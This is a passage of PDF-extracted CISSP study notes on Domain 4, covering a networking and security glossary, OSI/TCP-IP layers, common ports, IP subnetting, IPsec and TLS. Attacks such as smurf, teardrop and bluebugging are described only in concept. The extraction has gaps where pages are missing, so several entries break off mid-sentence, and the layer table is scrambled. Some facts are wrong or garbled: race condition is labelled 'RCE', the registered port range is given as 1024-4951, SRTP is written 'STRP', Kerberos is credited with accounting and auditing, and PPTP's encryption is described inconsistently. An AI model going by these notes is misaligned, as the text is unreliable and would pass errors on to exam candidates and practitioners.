Automatic Private IP Addressing (APIPA): acts as a failover mechanism for DHCP servers and makes it easier
to configure and support small LANs; primarily used in situations where a DHCP server is not available or is not
responding; APIPA address range is 169.254.0.0–169.254.255.255, with the subnet mask of 255.255.0.0 (/16)
Bandwidth: amount of information transmitted over a period of time; can be applied to moving bits over a
medium, or human processes like learning or education
Baseband Communication: refers to the transmission of a single signal over a medium using its original
frequencies (without modulation), and the entire bandwidth of the medium is used to carry the signal; ethernet
networks (like 10BASE-T) operate using baseband signaling, where the entire cable is dedicated to a single
communication channel
Bluebugging: a type of Bluetooth attack where an attacker exploits vulnerabilities in a device's Bluetooth
connection to gain unauthorized access and control over it; the attacker can then use this access to listen to
phone calls, read or send messages, steal data, or even manipulate the deviceʼs settings, all without the victim's
knowledge; to combat this attack, turn off Bluetooth when not in use, set to "non-discoverable", and use strong
authentication
Bluejacking: a relatively harmless Bluetooth-based attack where an attacker sends unsolicited messages to
nearby Bluetooth-enabled devices, such as mobile phones, tablets, or laptops; it exploits the Bluetooth feature
that allows devices to communicate over short distances (typically up to 10 meters) and works by pushing
messages to any device with Bluetooth set to "discoverable" mode
Bluesnarfing: Bluesnarfing is a Bluetooth-based attack where an attacker gains unauthorized access to data on
a victim's Bluetooth-enabled device; unlike Bluejacking (which only sends unsolicited messages), bluesnarfing
is a serious security threat because it involves stealing or retrieving sensitive data without the user's knowledge
or consent
Bluesniffing: Bluesniffing is a type of Bluetooth attack that involves eavesdropping on Bluetooth
communications to intercept data being exchanged between devices; itʼs a form of passive Bluetooth
reconnaissance where the attacker attempts to listen in on Bluetooth signals to gather information, much like
Wi-Fi sniffing attacks on wireless networks
Bound networks: AKA wired/Ethernet networks, where devices are connected by physical cables
Boundary routers: they advertise routes that external hosts can use to reach internal hosts
Broadband: refers to the transmission of multiple signals over a single communication medium using different
frequency ranges (via modulation); it allows simultaneous transmission of multiple channels or services;
65 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
policy for handling unauthenticated emails, such as quarantine or reject, and to receive reports on email
authentication results; DMARC works by checking that the "From" address matches the domain in the SPF and
DKIM checks (alignment)
DomainKeys Identified Mail (DKIM): an email authentication protocol that helps verify the authenticity of an
email sender and ensure message integrity; DKIM works by attaching a digital signature to the email header,
which is created using a private key known only to the sender's email server; the recipientʼs email server uses
the senderʼs public key, stored in DNS records, to verify this signature; if the signature is valid, it confirms the
email was sent from an authorized source and hasn't been altered in transit helping prevent email spoofing and
phishing by allowing recipients to verify that emails truly come from trusted domains
DNS: Domain Name Service is three interrelated elements: a service, a physical server, and a network protocol
DNS poisoning: act of falsifying DNS info used by clients to reach a system; can be accomplished via a rogue
DNS server, pharming, altering a hosts file, corrupting IP config, DNS query spoofing, and proxy falsification;
examples:
HOSTS poisoning
authorized DNS server attack
caching DNS server attack
changing a DNS server address
DNS query spoofing
Domain hijacking: or domain theft, is the malicious action of changing the registration of a domain name
without the authorization of the owner
Extranet: a private network similar to an intranet, but typically open to external parties, such as business
partners, suppliers, key customers, etc; main purpose of an extranet is to allow users to exchange data and
applications, and share information
Extensible Authentication Protocol (EAP): a framework that allows for various authentication methods to be
used for secure network access, including wireless networks, by providing a standardized way to exchange
authentication information between a client and an authentication server; it's not a specific authentication
method itself, but a platform to support multiple methods like passwords, certificates, or smart cards depending
on the chosen "EAP method"; EAP allows customized authentication security solutions
Email bombing: AKA "mail-bombing" - when email itself is used as an attack mechanism by flooding a system
with messages, causing a denial of service
Email security: internet email is based on SMTP, POP3, and IMAP, and is inherently insecure; email can be
secured, and the methods used must be addressed in a security policy; email security solutions include using
S/MIME, PGP, DKIM, SPF, DMARC, STARTTLS, and Implicit SMTPS
EPP: endpoint protection platform (EPP) is a variation of EDR; EPP focuses on four main security functions:
predict, prevent, detect, and respond; EPP is the more active predict and prevent variation of the more passive
EDR
Evil twin: a type of Wi-Fi attack where a malicious actor sets up a fake wireless access point (AP) that mimics a
legitimate one, with the goal of tricking users into connecting to the rogue access point, allowing the attacker to
intercept, monitor, and manipulate the victimʼs network traffic, potentially capturing sensitive data such as login
credentials, financial info, and personal communications
FDDI: Fiber Distributed Data Interface is an ANSI X3T9.5 LAN standard; 100 Mbps, token-passing using fiber-
optic, up to 2 kilometers
67 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
FCoE: Fibre Channel over Ethernet is a lightweight encapsulations protocol without the reliable data transport of
TCP
Gateway device: a firewall or other device that sits at the edge of the network to regulate traffic and enforce
rules
Generic Routing Encapsulation (GRE): a protocol for encapsulating data packets that use one routing protocol
inside the packets of another protocol; "encapsulating" means wrapping one data packet within another data
packet, like putting a box inside another box; encapsulation is the addition of a header, possibly footer, to the
data received by each layer from the layer above before handing it off to the layer below; the inverse action is
de-encapsulation; note that when using IPv4, the GRE header is inserted between the delivery and payload
headers
Host-based IDS (HIDS): monitor activity on a single system; one drawback of a HIDS is that attackers can
discover and disable them (compare to NIDS)
Hypervisor: aka virtual machine monitor/manager (VMM); the virtualization component that creates, manages,
and operates VMs
Hypervisor Type I: a native or bare-metal hypervisor; there is no host OS, the hypervisor installs directly onto
the hardware instead of the host OS
Hypervisor Type II: a hosted hypervisor; the hypervisor is installed as another app in the OS
ICMP: Internet Control Message Protocol, standardized by IETF via RFC 792 to determine if a particular host is
available
IGMP: Internet Group Management Protocol, used to manage multicasting groups
Implicit SMTPS: a method of securing email transmission by establishing a dedicated, encrypted connection
using TLS (Transport Layer Security) from the start, typically over port 465; unlike STARTTLS, which begins as
an unencrypted connection and then upgrades, Implicit SMTPS immediately initiates a secure connection,
making it less vulnerable to interception or downgrade attacks
Internetworking: two different sets of servers/communication elements using network protocol stacks to
communicate and coordinate activities
International Telecommunication Union Telecommunication Standardization Sector (ITU-T): responsible
for setting international standards for telecommunications and Information Communication Technology (ICT);
standards include X.509, Y.3172 and Y.3173 (machine learning), H.264/MPEG-4 AVC (video compression), and
ITU-T G.651.1 (multimode fiber)
IV (Initialization Vector) attack: occurs when attackers exploit weaknesses in how an IV is generated or used
in cryptographic systems, particularly in stream ciphers and certain modes of block ciphers; the Initialization
Vector (IV) is a random or pseudo-random value used to ensure that even if the same data is encrypted multiple
times, the resulting ciphertext is different each time; if the IV is predictable, reused, or improperly managed, it
can lead to security vulnerabilities, enabling attackers to decrypt data, tamper with messages, or perform replay
attacks
Layer 2 Tunneling Protocol (L2TP): a VPN tunneling protocol used to establish secure connections over public
networks by creating a virtual tunnel for data; L2TP itself does not provide encryption, so it is often paired with
IPsec (L2TP/IPsec) to provide confidentiality, integrity, and authentication; it operates at Layer 2 (Data Link
Layer) of the OSI model, encapsulating data for secure transmission, commonly used for remote access VPNs
and site-to-site connections
68 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
LDAP: lightweight directory access protocol uses simple (basic) authentication such as SSL/TLS, or SASL
(Simple Authentication and Security Layer)
Load balancers: used to spread or distribute network traffic load across several network links or devices, with
the purpose of optimizing infrastructure utilization, minimize response time, maximize throughput, reduce
overloading, and remove bottlenecks
MAC filtering: a list of authorized wireless client interface MAC addresses used by a WAP to block access to all
nonauthoried devices
Managed Detection and Response (MDR): a service that monitors an IT environment in real-time to detect
and resolve threats; not limited to endpoints, MDR focuses on threat detection and mediation; often a
combination and integration of numerous technologies, such as SIEM, network traffic analysis (NTA), EDR, and
IDS
Microsegmentation: part of a zero trust strategy that breaks or divides up an internal network into very small
(sometimes as small as a single device or important server/end-point), highly localized zones; each zone is
separated from others by internal segmentation firewalls (ISFWs), subnets, or VLANs; note that at the limit, this
places a firewall at every connection point
MSSP: managed security service provider (MSSP) provides centrally-controlled and managed XDR solutions;
can be fully deployed on-premise, in the cloud, or hybrid; MSSP solutions can be overseen through a SOC which
is itself local or remote; orgs working with an MSSP to provide EDR, MDR, EPP, or XDR leverages the experience
and expertise of the MSSP's staff
Network Address Translation (NAT): NAT translates IP addresses without changing port information, via one-
to-one (static NAT) or many-to-one (dynamic NAT); NAT protects the addressing scheme of a private network,
allowing the use of private IP addresses, and enables multiple internal clients to obtain internet access through a
few public IP addresses; NAT is supported by many security border devices, such as firewalls, routers,
gateways, WAPs, and proxies; NAT is useful when specific devices need to be accessible from outside the
network, like servers that host websites; also see PAT; The main difference between NAT and PAT is that PAT
uses port numbers to map private IP addresses to a public IP address, while NAT does not
Network-based IDS (NIDS): a network based IDS can monitor activity on a network, and isn't necessarily
visible to an attacker
Network container names: network containers by OSI layer: 7,6,5: protocol data unit (PDU); layer 4: segment
(TCP) or datagram (UDP); layer 3: packet; layer 2: frame; layer 1: bit
NFV: Network Function Virtualization (AKA Virtual Network Function) goal is to decouple functions, such as
firewall management, intrusion detection, NAT and name service resolution from specific hardware solutions,
and make them virtual/software; the focus is to optimize distinct network services
Nonroutable IP addresses: from RFC 1918; 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16
Northbound/Southbound interface: A northbound interface lets a specific component communicate with a
higher-level component in the same network; a southbound interface is the opposite — enabling a specific
component to communicate with a lower-level component
Online Certificate Status Protocol(OCSP): a real-time method for verifying the status of an X.509 (e.g.
SSL/TLS) digital certificate
Packet-Switched Network: a network that doesn't use a dedicated connection between endpoints; packet
switching occurs when the message or communication is broken up into small segments and sent across
69 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
intermediary networks to the destination; within packet-switching systems are two types of communication
paths (or virtual circuits): permanent virtual circuits (PVCs) and switched virtual circuits (SVCs)
Password Authentication Protocol (PAP): a password-based protocol that verifies users for Point-to-Point
Protocol (PPP); PAP transmits usernames and passwords in cleartext
Peering: a method for two or more networks to exchange data directly with each other without going through a
third party; a cost-effective way for networks to connect and improve performance; peering can be public (e.g.
connection through an internet exchange point) or private (e.g. colocation)
Phreaking: type of attack using various types of tech to circumvent the telephone system to make long-
distance calls, alter the phone service function, steal services, or cause service disruptions; a phreaker is the
phreaking attacker
Ping of Death (ping-of-death): an attack that sends numerous oversized ping packets to the victim, causing a
freeze, crash, or reboot
Plain Old Telephone Service (POTS): refers to the traditional, analog voice telephone service that has been in
use since the late 19th century; it operates over copper twisted-pair wires and provides basic telephone
functions like voice calling and fax transmission; POTS uses circuit-switched technology, establishing a
dedicated connection for the duration of a call; known for its reliability and simplicity, offering standard features
such as dial tone, ring tone, and support for analog devices like modems and fax machines
PLC: Packet Loss Concealment used in VoIP communications to mask the effect of dropped packets
Point-to-Point Protocol (PPP): an encapsulation protocol designed to support the transmission of IP traffic
over dial-up or point-to-point links; a standard method for transporting multiprotocol datagrams over point-to-
point links; original PPP options for authentication were PAP, CHAP, and EAP
Point-to-Point Tunneling Protocol (PPTP): an outdated VPN protocol that creates a secure tunnel for data
over IP networks, primarily for remote access; operates at Layer 2 (Data Link Layer) of the OSI model, PPTP
encapsulates data within IP packets but provides only basic encryption, making it relatively fast but less secure
by modern standards; due to its weaker security, PPTP has largely been replaced by more robust VPN
protocols, such as L2TP/IPsec and OpenVPN
Ports: associated with services on network architectures; 65,535 ports in total
Ports 0-1023: associated with common services
Ports 1024-4951: registered ports used with non-system applications associated with vendors and devs
Ports 49152-65535: dynamic ports (AKA private or non-reserved ports) used as temporary ports, often in
association when a service is requested via a well-known port
Port Address Translation (PAT): a type of NAT which allows multiple devices on a private network to use the
same public IP address by assigning each device a unique port number; PAT is useful when multiple devices
need internet access but there aren't many public IP addresses available; an extension of NAT translating all
addresses to one routable IP address and translating the source port number in the packet to a unique value
Private Branch Exchange (PBX): a private telephone network used within an org or enterprise, allowing
internal users to communicate with each other and share a certain number of external phone lines for making
outgoing calls; a PBX system manages incoming and outgoing calls, offering features such as call routing,
voicemail, call conferencing, extension dialing, and automated attendants; modern PBX systems can be
hardware-based, software-based, or hosted in the cloud, and they often support both traditional analog lines
and digital communication methods like VoIP (Voice over Internet Protocol); countermeasures to PBX fraud
include many of the same controls you would employ to protect a network (e.g. logical or technical,
administrative and physical controls)
70 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
Proximity device/reader: proximity devices can be passive, field-powered, or transponder; when a device
passes near a proximity reader, the reader is able to determine the identity and authorization status of the
bearer
Public Switched Telephone Network (PSTN): the global network of interconnected voice-oriented public
telephone systems; encompasses the world's circuit-switched telephone networks operated by national,
regional, and local telephony operators; the PSTN enables landline telephony and is responsible for routing calls
between different telephone networks, both domestically and internationally; uses a combination of copper
wires, fiber optics, microwave transmission, and undersea cables to facilitate voice communication across vast
distances
Race condition (RCE): AKA race hazard is the condition of an electronics, software, or other system where the
system's substantive behavior is dependent on the sequence or timing of other uncontrollable events, leading to
unexpected or inconsistent results
RPC: Remote Procedure Call is a protocol that enables one system to execute instructions on other hosts across
a network infrastructure
Root of Trust: a source that can always be trusted within a cryptographic system; because cryptographic
security is dependent on keys to encrypt and decrypt data and perform functions such as generating digital
signatures and verifying signatures, RoT schemes generally include a hardened hardware module; a RoT
guarantees the integrity of the hardware prior to loading the OS of a computer
Screened subnet: AKA DMZ (or demilitarized zone) is a network security architecture that uses firewalls to
create a barrier between the public internet and the internal network, allowing only controlled access to
external-facing servers while protecting the internal network from potential attacks
Sender Policy Framework (SPF): an email authentication protocol that helps verify if an email claiming to come
from a specific domain is sent by an authorized mail server; SPF works by allowing domain owners to publish a
list of approved sending IP addresses in their DNS records; when an email is received, the recipient's server
checks the SPF record to ensure the email was sent from an authorized IP; if the IP is listed, the email is more
likely to be legitimate and if not, it may be flagged as spam or rejected, helping to prevent email spoofing and
phishing
SIPS: secure version of the Session Initialization Protocol for VoIP, adds TLS encryption to keep the session
initialization process secure
Stateless Address Autoconfiguration (SLAAC): a method in IPv6 where devices automatically configure their
IP addresses without relying on a DHCP server, using Router Advertisements (RAs) to obtain network prefixes
and their own interface identifiers to create unique addresses
Smartcard: credit card-sized IDs, badges, or security passes with a magnetic stripe, bar code, or integrated
circuit chip, containing info about the authorized bearer; used for identification or auth purposes; smartcards
can include microprocessors and cryptographic certificates
S/MIME: provides the following cryptographic security services for electronic messaging applications:
- Authentication
- Message integrity
- Non-repudiation of origin (using digital signatures)
- Privacy
- Data security (using encryption)
S/MIME specifies the MIME type application/pkcs7-mime (smime-type "enveloped-data") for data
enveloping (encrypting) where the whole (prepared) MIME entity to be enveloped is encrypted and
packed into an object which subsequently is inserted into an application/pkcs7-mime MIME entity
71 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
S/MIME is a standard for public key encryption, providing security services for digital messaging apps
S/MIME requires the use of a PKI in order to work properly
S/MIME is the emerging standard for secure email / encrypted messages
SNMP: Simple Network Management Protocol, is a protocol for collecting and organizing info about managed
devices on IP networks; it can be used to determine the health of devices such as routers, switches, servers,
workstations, etc
Smurf attack: ICMP echo request sent to the network broadcast address of a spoofed victim causing all nodes
to respond to the victim with an echo reply; a smurf attack is a form of DoS employing an amplification network
to send numerous response packets to the victim
SPML: Service Provisioning Markup Language is XML-based and designed to allow platforms to generate and
respond to provisioning requests; uses the concept of requesting authority, a provisioning service point, and a
provisioning service target; requesting authorities issue SPML requests to a provisioning service point;
provisioning service targets are often user accounts and are required to be allowed unique identification of the
data in its implementation
STARTTLS: an email protocol command that upgrades an existing, insecure connection to a secure, encrypted
connection using TLS (Transport Layer Security); commonly used in SMTP (Simple Mail Transfer Protocol), as
well as IMAP and POP3 for email retrieval; when STARTTLS is enabled, email servers negotiate encryption with
each other, protecting the email content and credentials from interception during transmission
STRP: Secure Real-time Transport Protocol is an extension of Real-time Transport Protocol (RTP) that features
encryption, confidentiality, message authentication, and replay protection to audio and video traffic
Multi-tiered firewall: tiers are not the number of firewalls but the number of zones protected by the firewall; 2-
tier protects two zones
Network Polling: a communication method used in network systems where a central controller or master
device periodically checks, or "polls," each connected device (node) to determine if it has data to transmit or to
monitor its status; method ensures orderly communication by controlling when devices can send data,
preventing data collisions and efficiently managing network traffic
TCP ACK scan: type of network discovery scan, attempting to simulate an already-opened network connection;
sending an ACK packet, simulating a packet from the middle of an already established connection
Teardrop attack: exploits reassembly of fragmented IP packets in the fragment offset field (indicating the start
position or offset of data contained in a fragmented packet)
Terminal Emulation Protocol: designed to provide access between hosts; allows a computer to act like a
traditional terminal and send commands/receive output from a remote system via a graphical interface;
examples include Telnet, SSH, and Kermit
Token Passing: a network access method used to control which devices can transmit data at any given time; a
special data packet called a "token" circulates among the connected devices (nodes), and only the device that
holds the token is permitted to send data over the network
Tunneling: the encapsulation of protocol-deliverable message within a second protocol; the second protocol
often performs encryption to protect the message contents
Unbound (Wireless) Network: network where the physical layer interconnections are done using radio, light, or
some other means (not confined to wires, cables, or fibers); may or may not be mobile
VLAN hopping: a method of attacking the network resources of a VLAN by sending packets to a port not
usually accessible from an end system; the goal of this form of attack is to gain access to other VLANs on the
72 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
same network
Virtual Routing and Forwarding (VRF): allows multiple routing tables to be used on the same device
simultaneously, similar to the concept of a VLAN (which is layer 2), but operating at layer 3; because routing
instances operate independently, VRF allows IP addresses to overlap without conflict which supports
segmentation and permits flexibility for zero trust implementations
WAF: Web Application Firewall is a software-based app that monitors and filters exchanges between
applications and a host; usually inspect and filter conversations like HTTP/S
X.509: an ITU standard defining the format of public key certificates; X.509 certificates are used in many
Internet protocols, including TLS/SSL, which is the basis for HTTPS; they are also used in offline applications,
like electronic signatures
XDR: extended detection and response (XDR) components usually include EDR, MDR, and EPP elements; XDR
is not solely focused on endpoints, often including NTA, NIDS, and NIPS functionality
4.1 Apply secure design principles in network architectures (OSG-10 Chpts 11,12)
4.1.1 Open System Interconnection (OSI) and Transmission Control Protocol/Internet Protocol (TCP/IP) models
TCP/IP: AKA DARPA or DOD model has four layers: Application (AKA Process), Transport (AKA Host-to-
Host), Internet (AKA Internetworking), and Link (AKA Network Interface or Network Access)
OSI: Open Systems Interconnection (OSI) Reference Model developed by ISO (International Organization
for Standardization) to establish a common communication structure or standard for all computer
systems; it is an abstract framework
- Communication between layers via encapsulation (at each layer, the previous layer's header and
payload become the payload of the current layer) and de-encapsulation (inverse action occurring as
data moves up layers)
Layer OSIlayer
model TCP/IP
model PDU Devices Protocols
HTTP/s, DNS, DHCP, FTP, LPD,
7 Application Application Data Application S-HTTP,
SMTP,
TPFT, Telnet, SSH,
POP3, PEM, IMAP, NTP,
Firewall SNMP, TLS/SSL, GBP, SIP,
S/MIME, X Window, NFS etc.
6 Presentation Application Data JPEG, ASCII, MIDI etc
5 Session Application Data Circuit Proxy NetBIOS, RPC
Firewall
Transport Segments TCP (connection oriented),
4 Transport (host-to- (TCP) /
Datagrams UDP (connectionless), TLS,
host) (UDP) BGP
Router,
Multilayer
3 Network Internet/IP Packets Switch,
Packet
IPv4, IPv6, IPSec, OSPF, EIGRP,
ICMP, IGMP, RIP, NAT
Filtering
Firewall
73 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
simplex: one-way
half-duplex: both comm devices can transmit/receive, but not at the same time
full-duplex: both comm devices can transmit/receive at same time
data transfer
connection release
Uses data streams
Protocols at layer 5 include NetBIOS, and RPC
Transport Layer (4)
Responsible for managing the integrity of a connection and controlling the session; providing
transparent data transport and end-to-end transmission control
Defines session rules like how much data each segment can contain, how to verify message
integrity, and how to determine whether data has been lost
Protocols that operate at the Transport layer:
Transmission Control Protocol (TCP)
the major transport protocol in the internet suite of protocols providing reliable,
connection-oriented, full-duplex streams
emphasizing: full-duplex, connection-oriented protocol
uses three-way handshake using following three steps: synchronize (SYN),
synchronize-acknowledge (SYN-ACK), and acknowledge (ACK)
TCP header flags:
URG ACK PSH RST SYN FIN (mnemonic: Unskilled Attackers Pester Real
Security Folks)
TCP Packet Header: 10 fields, 160 bits, including source port, destination port,
sequence number, acknowledgement number, checksum etc
User Datagram Protocol (UDP)
connectionless protocol that provides fast, best-effort delivery of datagrams
(self-container unit of data)
UDP Datagram Header: 4 fields, 64 bits, including source port, destination port,
length of data, checksum
Transport Layer Security (TLS)
note: in the OSI model, TLS operates on four layers: Application, Presentation,
Session, and Transport; in the TCP/IP model, it operates only on the Transport
layer
BGP: Border Gateway Protocol - used to exchange routing and reachability information
between routers (looking at available paths, picking the best)
Segmentation, sequencing, and error checking occur at the Transport layer
Network Layer (3)
Responsible for logical addressing, and providing routing or delivery guidance (but not
necessarily verifying guaranteed delivery), manages error detection and traffic control
Internet Control Message Protocol (ICMP): allows network devices to send error and
control messages and provides Ping and Traceroute utilities
Internet Group Management Protocol (IGMP): allows hosts and adjacent routers on IP
networks to establish multicast group memberships
routing protocols: move routed protocol messages across a network
includes RIP, OSPF, IS-IS, IGRP, IGMP, and BGP
routing protocols are defined at the Network Layer and specify how routers
communicate
routing protocols can be static or dynamic, and categorized as interior or exterior
75 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
PPTP: Point-to-Point Tunneling Protocol - used for creating VPNs; does not include
encryption/authentication and considered obsolete
PPP: Point-to-Point Protocol - encapsulates IP traffic so that it can be transmitted over
analog connections and provides authentication, encryption, and compression;
replaced SLIP; authentication protocols include Password Authentication Protocol
(PAP), Challenge-Handshake Authentication protocol (CHAP), and Extensible
Authentication Protocol (EAP)
RARP: Reverse Address Resolution Protocol - translates a MAC address to an IP
address
Physical Layer (1)
Converts a frame into bits for transmission/receiving over the physical connection medium
Network hardware devices that function at layer 1 include NICs, hubs, repeaters,
concentrators, amplifiers
Know four basic network topologies:
star: each individual node on the network is directly connect to a
switch/hub/concentrator
mesh: all systems are interconnected; partial mesh can be created by adding multiple
NICs or server clustering
ring: closed loop that connects end devices in a continuous ring (all communication
travels in a single direction around the ring);
Multistation Access Unit (MSAU or MAU) connects individual devices
used in token ring and FDDI networks
bus: all devices are connected to a single cable (backbone) terminated on both ends
Know commonly used twisted-pair cable categories
Know cable types & characteristics
Protocols:
802.11: a family of protocols for wireless local area networks including 802.11a, b, g, n,
ac, ax
Common TCP Ports
Port Protocol
20,21 FTP
22 SSH
23 Telnet
25 SMTP
53 DNS
80 HTTP
110 POP3
137-139 NETBIOS
143 IMAP
389 LDAP
443 HTTPS
445 AD, SMB
77 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
Port Protocol
636 Secure LDAP
1433 MS SQL Server
3389 RDP
4.1.2 Internet Protocol (IP) version 4 and 6 (IPv6) (e.g., unicast, broadcast, multicast, anycast)
IP is part of the TCP/IP (Transmission Control Protocol/Internet Protocol) suite
TCP/IP is the name of IETF's four-layer networking model, and its protocol stack; the four layers are:
link (physical), internet (network-to-network), transport (channels for connection/connectionless
data exchange) and application (where apps make use of network services)
IP provides the foundation for other protocols to be able to communicate; IP itself is a
connectionless protocol
IPv4: dominant protocol that operates at layer 3; IP is responsible for addressing packets, using 32-
bit addresses
IPv6: modernization of IPv4, uses 128-bit (16-byte) addresses, supporting 2^128 total addresses;
makes IPSec mandatory
TCP or UDP is used to communicate over IP
IP Subnetting: method used to divide a large network into smaller, manageable pieces, called
subnets
IP addresses: like a street address that identifies a device on a network in two parts:
network: identifies the "neighborhood" or network of the device
host: specifies the device (or "house") in that neighborhood
subnet mask: tool to divide the IP address into its network and host parts; e.g. 192.168.1.15
with subnet mast of 255.255.255.0 tells us that 192.168.1 is the network, and 15 is the host or
device part
CIDR notation: a compact way of representing IP addresses and their associated network masks
example: 192.168.1.0/24
consists of two parts:
IP address: 192.168.1.0 - the network or starting address
/24 - specifies how many bits of the IP address are used for the network part;
here /24 means the first 24 bits (out of 32 for IPv4) are used for the network
part, and the remaining bits are used for the host addresses in that network
/24 is the same as 255.255.255.0 (where again 24 bits represented by 255.255.255
define the network, and .0 defines the host range)
IP address range: 192.168.1.0/24 represents the network 192.168.1.0 and all IPs from
192.168.1.1 to 192.168.1.254; 2^8=256 IP address, but 254 are usable (excludes
network and broadcast addresses)
other examples:
10.0.0.0/16: where /16 means the first 16 bits are reserved for the network, leaving 16
bits for hosts; allows 2^16 or 65,536 IP addresses, with 65,534 usable addresses
172.16.0.0/12: /12 means 12 bits are for the network, leaving 20 bits for hosts; providing
2^20 = 1,048,576 IP addresses
78 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
Network Classes: IPv4 class A network contains 16,777,216 addresses; class B contains 65,534;
Class C contains 254
IPSec provides data authentication, integrity and confidentiality
specifically, IPsec provides encryption, access control, nonrepudiation, and message
authentication using public key cryptography
Anycast: nearest or best; helpful when using CDN (content distribution network), which is about getting
data as physically close to the user as possible; anycast will ensure that I'm connected to the source that
will provide the best/fastest source
Application Layer: defines protocols for node-to-node application communication and provides services
to the application software running on a computer
Broadcast: a one-to-all communication method where data is sent from one sender to all possible
receivers within a network segment; in broadcasting, a single data packet is transmitted, and all devices
on the network receive it, regardless of whether they need the information
Internet Layer: defines the protocols for logically transmitting packets over the network
Logical address: occurs when an address is assigned and used by software or a protocol rather than
being provided/controlled by hardware
Network layerʼs packet header includes the source and destination IP addresses
Multicast: is a one-to-many communication method where data is transmitted from one sender to
multiple specific receivers who are part of a multicast group; unlike broadcast, multicast only targets
devices that have expressed interest in receiving the data, making it more efficient by conserving
bandwidth and reducing unnecessary network load; used for live video streaming, online gaming, and
conferencing
Network Access Layer: defines the protocols and hardware required to deliver data across a physical
network
Unicast: a one-to-one communication method where data is transmitted from a single sender to a single
receiver; in unicast, each data packet is sent directly to a specific destination address, and is the most
common form of internet communication, where data is exchanged between individual devices
Transport Layer: defines protocols for setting up the level of transmission service for applications; this
layer is responsible for the reliable transmission of data and the error-free delivery of packets
4.1.3 Secure protocols (e.g., Internet Protocol Security (IPSec), Secure Shell (SSH), Secure Sockets Layer
(SSL)/Transport Layer Security (TLS))
Kerberos: standards-based network authentication protocol, used in many products (most notably
Microsoft Active Directory Domain Services or AD DS)
Kerberos is mostly used on LANs for organization-wide authentication, single sign-on (SSO) and
authorization; Kerberos provides three primary functions: accounting, authentication, and auditing
SSL and TLS: data protection; used for protecting website transactions (e.g. banking, e-commerce)
SSL and TLS both offer data encryption, integrity and authentication
TLS has supplanted SSL (the original protocol, considered legacy/insecure)
TLS was initially introduced in 1999 but didnʼt gain widespread use until years later
The original versions of TLS (1.0 and 1.1) are considered deprecated and organizations should be
relying on TLS 1.2 or 1.3
79 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
The defacto standard for secure web traffic is HTTP over TLS, which relies on hybrid cryptography:
using asymmetric cryptography to exchange an ephemeral session key, which is then used to carry
on symmetric cryptography for the remainder of the session
Secure File Transfer Protocol (SFTP): a version of FTP that includes encryption and is used for
transferring files between two devices (often a client / server)
Secure Shell (SSH): remote management protocol, which operates over TCP/IP
all communications are encrypted
primarily used by IT administrators to manage devices such as servers and network devices
Internet Protocol Security (IPSec): an IETF standard suite of protocols that is used to connect nodes
(e.g. computers or office locations) together
IPsec protocol standard provides a common framework for encrypting network traffic and is built
into a number of common OSs
IPsec establishes a secure channel in either transport or tunnel mode
IPsec performs reauthentication of the client system throughout the connected session in order to
detect session hijacking
IPsec uses two protocols: Authentication Header (AH) and Encapsulating Security Payload (ESP) --
see below
widely used in virtual private networks (VPNs)
IPSec provides encryption, authentication and data integrity
transport mode: only packet payload is encrypted for peer-to-peer communication
tunnel mode: the entire packet (including header) is encrypted for gateway-to-gateway
communication
security association (SA): represents a simplex communication connection/session, recording
any config and status info
authentication header (AH): provides authentication, integrity, and nonrepudiation; provides
assurance of message integrity, authentication and access control, preventing replay attacks; does
not provide encryption; like an official authentication stamp, but it's not encrypted so anyone can
read it
encapsulating security payload (ESP): provides encryption of the payload which provides
confidentiality and integrity of packet content; works with tunnel or transport mode; provides
limited authentication and preventing replay attacks (not to the degree of AH)
Internet Security Association and Key Management Protocol (ISAKMP): an element of IKE used
to organize and manage encryption keys generated/exchanged by OAKLEY and SKEME; a security
association is the agreed-upon method of auth and encryption used by two entities; ISAKMP's use
of security associations enables IPsec to support multiple simultaneous VPNs from each host; the
Oakley protocol specifies a sequence of key exchanges and describes their services (such as
identity protection and authentication); and SKEME specifies the actual method of key exchange
Internet Key Exchange (IKE): a standard protocol used to set up a secure and authenticated
communication channel between two parties via a virtual private network (VPN); the protocol ensures
security for VPN negotiation, remote host and network access
4.1.4 Implications of multilayer protocols
TCP/IP is a multilayer protocol, and derives several associated benefits
this means that protocols can be encapsulated within others (e.g. HTTP is encapsulated within
TCP, which is in turn encapsulated in IP, which is in Ethernet), and additional security protocols can
also be encapsulated in this chain (e.g. TLS between HTTP and TCP, which is HTTPS)
note that VPNs use encapsulation to enclose (or tunnel) one protocol inside another
Multilayer benefits:
many different protocols can be used at higher layers
encryption can be incorporated (at various layers)
80 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
Topology: how devices are interconnected (like bus, star, ring, tree, mesh)
Data plane: forwards packets based on the direction of the control plane (packet forwarding & switching);
the "do-er", within a switch, the data plane is what are the components in the switch actually moving the
data around; transfers packets across the network based on direction from the control plane; can use cut-
through, or store-and-forward
Control plane: functionss and processes which determine paths (route calculation / determination, OSPF,
BGP); the intelligence, determines the optimal path for data packets
Management plane: manages and monitors the network's operations; the overall
intelligence/configuration of the network
Physical topology: the physical connections between devices, and how they are connected to the
network; dictates how devices are physically linked and how thye communicate over these physical
connections
Logical topology: defines how data actually flows within the network, regardless of its physical layout; e.g.
in a star-shaped physical network, the logical topology might be a bus if all communications are being
broadcast to all nodes
Cut-through: switch starts forwarding the packet as soon as it reads the destination address, without
waiting for the entire packet to be received; reduces latency but does not allow for error checking of the
entire packet
Store-and-forward: switch receives the entire packet, checks it for errors, and then forwards it to the
destination; introduces more latency, but ensures that the packet is error-free before forwarding
4.1.7 Performance metrics (e.g., bandwidth, latency, jitter, throughput, signal-to-noise ratio)
Bandwidth: theorectical maximum amount of data that can be transmitted over a network or internet
connection in a given amount of time
Throughput: the actual rate of data tranfser successfuly transmitted over a network in a given amount of
time
Signal-to-noise ratio (SNR): measure of the level of the desired signal to the level of background noise;
a higher SNR allows for higher data rates
Latency: time it takes for a signal to travel from its source to its destination and back (round-trip time,
